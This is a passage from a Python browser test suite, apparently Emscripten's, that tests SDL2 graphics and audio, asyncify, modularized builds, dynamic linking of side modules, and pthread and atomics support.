self.btest('sdl2_gldrawelements.c', reference='sdl2_gldrawelements.png',
args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_SDL=2'],
message='GL drawing modes. Bottom: points, lines, line loop, line strip. Top: triangles, triangle strip, triangle fan, quad.')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = open('test.html').read()
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
create_test_file('test.html', html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(path_from_root('tests', 'freetype', 'LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window')
def test_sdl2_custom_cursor(self):
shutil.copyfile(path_from_root('tests', 'cursor.bmp'), 'cursor.bmp')
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
def test_sdl2_misc(self):
self.btest('sdl2_misc.c', expected='1', args=['-s', 'USE_SDL=2'])
print('also test building to object files first')
self.run_process([EMCC, '-c', path_from_root('tests', 'sdl2_misc.c'), '-s', 'USE_SDL=2', '-o', 'test.o'])
self.compile_btest(['test.o', '-s', 'USE_SDL=2', '-o', 'test.html'])
self.run_browser('test.html', '...', '/report_result?1')
@parameterized({
'dash_s': (['-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2'],),
'dash_l': (['-lSDL2', '-lSDL2_mixer'],),
})
@requires_sound_hardware
def test_sdl2_mixer_wav(self, flags):
shutil.copyfile(path_from_root('tests', 'sounds', 'the_entertainer.wav'), 'sound.wav')
self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-s', 'INITIAL_MEMORY=33554432'] + flags)
@parameterized({
'wav': ([], '0', 'the_entertainer.wav'),
'ogg': (['ogg'], 'MIX_INIT_OGG', 'alarmvictory_1.ogg'),
'mp3': (['mp3'], 'MIX_INIT_MP3', 'pudinha.mp3'),
})
@requires_sound_hardware
def test_sdl2_mixer_music(self, formats, flags, music_name):
shutil.copyfile(path_from_root('tests', 'sounds', music_name), music_name)
self.btest('sdl2_mixer_music.c', expected='1', args=[
'--preload-file', music_name,
'-DSOUND_PATH=' + json.dumps(music_name),
'-DFLAGS=' + flags,
'-s', 'USE_SDL=2',
'-s', 'USE_SDL_MIXER=2',
'-s', 'SDL2_MIXER_FORMATS=' + json.dumps(formats),
'-s', 'INITIAL_MEMORY=33554432'
])
@no_wasm_backend('cocos2d needs to be ported')
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(system_libs.Ports.get_build_dir(), 'cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-s', 'USE_COCOS2D=3', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=0',
'--preload-file', preload_file, '--use-preload-plugins',
'-Wno-inconsistent-missing-override'],
message='You should see Cocos2d logo')
def test_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('browser/async.cpp', '1', args=['-O' + str(opts), '-g2'] + self.get_async_args())
@requires_threads
def test_async_in_pthread(self):
self.btest('browser/async.cpp', '1', args=self.get_async_args() + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-g'])
def test_async_2(self):
# Error.stackTraceLimit default to 10 in chrome but this test relies on more
# than 40 stack frames being reported.
create_test_file('pre.js', 'Error.stackTraceLimit = 80;\n')
self.btest('browser/async_2.cpp', '40', args=['-O3', '--pre-js', 'pre.js'] + self.get_async_args())
def test_async_virtual(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual.cpp', '5', args=['-O' + str(opts), '-profiling'] + self.get_async_args())
def test_async_virtual_2(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual_2.cpp', '1', args=['-O' + str(opts), '-s', 'ASSERTIONS=1', '-s', 'SAFE_HEAP=1', '-profiling'] + self.get_async_args())
# Test async sleeps in the presence of invoke_* calls, which can happen with
# longjmp or exceptions.
@parameterized({
'O0': ([],), # noqa
'O3': (['-O3'],), # noqa
})
def test_async_longjmp(self, args):
self.btest('browser/async_longjmp.cpp', '2', args=args + self.get_async_args())
def test_async_mainloop(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_mainloop.cpp', '121', args=['-O' + str(opts)] + self.get_async_args())
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-Os', '-s', 'ASSERTIONS=1', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP=1', '-lSDL'] + self.get_async_args(), timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-Os'] + self.get_async_args())
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=self.get_async_args())
def test_async_iostream(self):
self.btest('browser/async_iostream.cpp', '1', args=self.get_async_args())
# Test an async return value. The value goes through a custom JS library
# method that uses asyncify, and therefore it needs to be declared in
# ASYNCIFY_IMPORTS.
# To make the test more precise we also use ASYNCIFY_IGNORE_INDIRECT here.
@parameterized({
'normal': (['-s', 'ASYNCIFY_IMPORTS=["sync_tunnel"]'],), # noqa
'response': (['-s', 'ASYNCIFY_IMPORTS=@filey.txt'],), # noqa
'nothing': (['-DBAD'],), # noqa
'empty_list': (['-DBAD', '-s', 'ASYNCIFY_IMPORTS=[]'],), # noqa
'em_js_bad': (['-DBAD', '-DUSE_EM_JS'],), # noqa
})
def test_async_returnvalue(self, args):
if '@' in str(args):
create_test_file('filey.txt', '["sync_tunnel"]')
self.btest('browser/async_returnvalue.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_IGNORE_INDIRECT', '--js-library', path_from_root('tests', 'browser', 'async_returnvalue.js')] + args + ['-s', 'ASSERTIONS=1'])
def test_async_stack_overflow(self):
self.btest('browser/async_stack_overflow.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_STACK_SIZE=4'])
def test_async_bad_list(self):
self.btest('browser/async_bad_list.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_ONLY=["waka"]', '--profiling'])
# Tests that when building with -s MINIMAL_RUNTIME=1, the build can use -s MODULARIZE=1 as well.
def test_minimal_runtime_modularize(self):
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.html', '-s', 'MODULARIZE=1', '-s', 'MINIMAL_RUNTIME=1'])
self.run_browser('test.html', None, '/report_result?0')
@requires_sync_compilation
def test_modularize(self):
for opts in [
[],
['-O1'],
['-O2', '-profiling'],
['-O2'],
['-O2', '--closure', '1']
]:
for args, code in [
# defaults
([], '''
let promise = Module();
if (!promise instanceof Promise) throw new Error('Return value should be a promise');
'''),
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // errorneous module capture will load this and cause timeout
let promise = HelloWorld();
if (!promise instanceof Promise) throw new Error('Return value should be a promise');
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
# Even without a mem init file, everything is async
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
]:
print('test on', opts, args, code)
# this test is synchronous, so avoid async startup due to wasm features
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-s', 'MODULARIZE=1', '-s', 'SINGLE_FILE=1'] + args + opts)
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
def test_modularize_network_error(self):
test_c_path = path_from_root('tests', 'browser_test_hello_world.c')
browser_reporting_js_path = path_from_root('tests', 'browser_reporting.js')
self.compile_btest([test_c_path, '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path])
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err.message.slice(0, 54));
});
</script>
''')
print('Deleting a.out.wasm to cause a download error')
os.remove('a.out.wasm')
self.run_browser('a.html', '...', '/report_result?abort(both async and sync fetching of the wasm failed)')
def test_modularize_init_error(self):
test_cpp_path = path_from_root('tests', 'browser', 'test_modularize_init_error.cpp')
browser_reporting_js_path = path_from_root('tests', 'browser_reporting.js')
self.compile_btest([test_cpp_path, '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path])
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
if (typeof window === 'object') {
window.addEventListener('unhandledrejection', function(event) {
reportResultToServer("Unhandled promise rejection: " + event.reason.message);
});
}
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err);
});
</script>
''')
self.run_browser('a.html', '...', '/report_result?intentional error to test rejection')
# test illustrating the regression on the modularize feature since commit c5af8f6
# when compiling with the --preload-file option
@no_wasm_backend('cannot customize INITIAL_MEMORY in wasm at runtime')
def test_modularize_and_preload_files(self):
# amount of memory different from the default one that will be allocated for the emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
# the main function simply checks that the amount of allocated heap memory is correct
create_test_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use eval here in order for the test with closure compiler enabled to succeed
var totalMemory = Module['INITIAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
REPORT_RESULT(0);
return 0;
}
''' % totalMemory)
# generate a dummy file
create_test_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
self.compile_btest(['test.c', '-s', 'WASM=0', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom INITIAL_MEMORY value
var foo = Foo({ INITIAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
# see original in test_core.py
self.run_process([PYTHON, path_from_root('tools', 'webidl_binder.py'),
path_from_root('tests', 'webidl', 'test.idl'),
'glue'])
self.assertExists('glue.cpp')
self.assertExists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
@requires_sync_compilation
def test_dynamic_link(self):
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
REPORT_RESULT(2);
return 0;
}
''')
create_test_file('side.cpp', r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL=1'])
print('wasm in worker (we can read binary data synchronously there)')
create_test_file('pre.js', '''
var Module = { dynamicLibraries: ['side.wasm'] };
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '--proxy-to-worker', '-s', 'EXPORT_ALL=1'])
print('wasm (will auto-preload since no sync binary reading)')
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
# same wasm side module works
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL=1'])
# verify that dynamic linking works in all kinds of in-browser environments.
# don't mix different kinds in a single test.
def test_dylink_dso_needed(self):
self._run_dylink_dso_needed(0)
def test_dylink_dso_needed_inworker(self):
self._run_dylink_dso_needed(1)
def _run_dylink_dso_needed(self, inworker):
self.emcc_args += ['-O2']
def do_run(src, expected_output):
# XXX there is no infrastructure (yet ?) to retrieve stdout from browser in tests.
# -> do the assert about expected output inside browser.
#
# we have to put the hook into post.js because in main it is too late
# (in main we won't be able to catch what static constructors inside
# linked dynlibs printed), and in pre.js it is too early (out is not yet
# setup by the shell).
create_test_file('post.js', r'''
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = "";
Module.printed += x + '\n'; // out is passed str without last \n
Module.realPrint(x);
};
''')
src += r'''
#include <emscripten/em_asm.h>
int main() {
test_main();
EM_ASM({
var expected = %r;
assert(Module.printed === expected, ['stdout expected:', expected]);
});
REPORT_RESULT(0);
}
''' % (expected_output,)
# --proxy-to-worker only on main
if inworker:
self.emcc_args += ['--proxy-to-worker']
self.btest(src, '0', args=self.get_emcc_args() + ['--post-js', 'post.js'])
self._test_dylink_dso_needed(do_run)
@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
REPORT_RESULT(1);
return 0;
}
''')
create_test_file('side.cpp', r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-lSDL', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE=1', '-O2', '-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL=1'])
def test_dynamic_link_many(self):
# test asynchronously loading two side modules during startup
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side1.wasm', 'side2.wasm'];
''')
create_test_file('main.c', r'''
int side1();
int side2();
int main() {
return side1() + side2();
}
''')
create_test_file('side1.c', r'''
int side1() { return 1; }
''')
create_test_file('side2.c', r'''
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.c', '-s', 'SIDE_MODULE=1', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.c', '-s', 'SIDE_MODULE=1', '-o', 'side2.wasm'])
self.btest_exit(self.in_dir('main.c'), '3',
args=['-s', 'MAIN_MODULE=1', '--pre-js', 'pre.js'])
def test_memory_growth_during_startup(self):
create_test_file('data.dat', 'X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'INITIAL_MEMORY=16MB', '-s', 'TOTAL_STACK=16384', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
create_test_file('html.html', open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
@requires_threads
def test_pthread_c11_threads(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_c11_threads.c'),
expected='0',
force_c=True,
args=['-g4', '-std=gnu11', '-xc', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'TOTAL_MEMORY=64mb'])
# Test that the emscripten_ atomics api functions work.
@parameterized({
'normal': ([],),
'closure': (['--closure', '1'],),
})
@requires_threads
def test_pthread_atomics(self, args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '-g1'] + args)
# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@requires_threads
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads)
# Test c++ std::thread::hardware_concurrency()
@requires_threads
def test_pthread_hardware_concurrency(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_hardware_concurrency.cpp'), expected='0', args=['-O2', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE="navigator.hardwareConcurrency"'])
@parameterized({
'join': ('join',),
'wait': ('wait',),
})
@requires_threads
def test_pthread_main_thread_blocking(self, name):
print('Test that we error if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
if name == 'join':
print('Test that by default we just warn about blocking on the main thread.')
self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(path_from_root('tests', 'pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD, and even without a pool')
self.btest(path_from_root('tests', 'pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS=1', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that everything works ok when we are on a pthread.')
self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-Os']]:
for debug in [[], ['-g']]:
args = opt + debug
print(args)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=args + ['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# 64 bit version of the above test.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Tests the rest of the remaining GCC atomics after the two above tests.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@requires_threads
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, also_asmjs=True)
# Test that basic thread creation works.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_create(self):
def test(args):
print(args)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'),
expected='0',
args=['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + args,
extra_tries=0) # this should be 100% deterministic
print() # new line
test([])
test(['-O3'])
# TODO: re-enable minimal runtime once the flakiness is figure out,
# https://github.com/emscripten-core/emscripten/issues/12368
# test(['-s', 'MINIMAL_RUNTIME=1'])
# Test that preallocating worker threads work.
@requires_threads
def test_pthread_preallocates_workers(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_preallocates_workers.cpp'), expected='0', args=['-O3', '-s', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=4', '-s', 'PTHREAD_POOL_DELAY_LOAD=1'])
# Test that allocating a lot of threads doesn't regress. This needs to be checked manually!
@requires_threads
def test_pthread_large_pthread_allocation(self):
self.btest(path_from_root('tests', 'pthread', 'test_large_pthread_allocation.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=128MB', '-O3', '-s', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=50'], message='Check output from test to ensure that a regression in time it takes to allocate the threads has not occurred.')
# Tests the -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_to_pthread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'] + modularize)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that threads can rejoin the pool once detached and finished
@requires_threads
def test_std_thread_detach(self):
self.btest(path_from_root('tests', 'pthread', 'test_std_thread_detach.cpp'), expected='0', args=['-s', 'USE_PTHREADS=1'])
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
@no_chrome('pthread_kill hangs chrome renderer, and keep subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
@requires_threads
def test_pthread_attr_getstack(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_attr_getstack.cpp'), expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
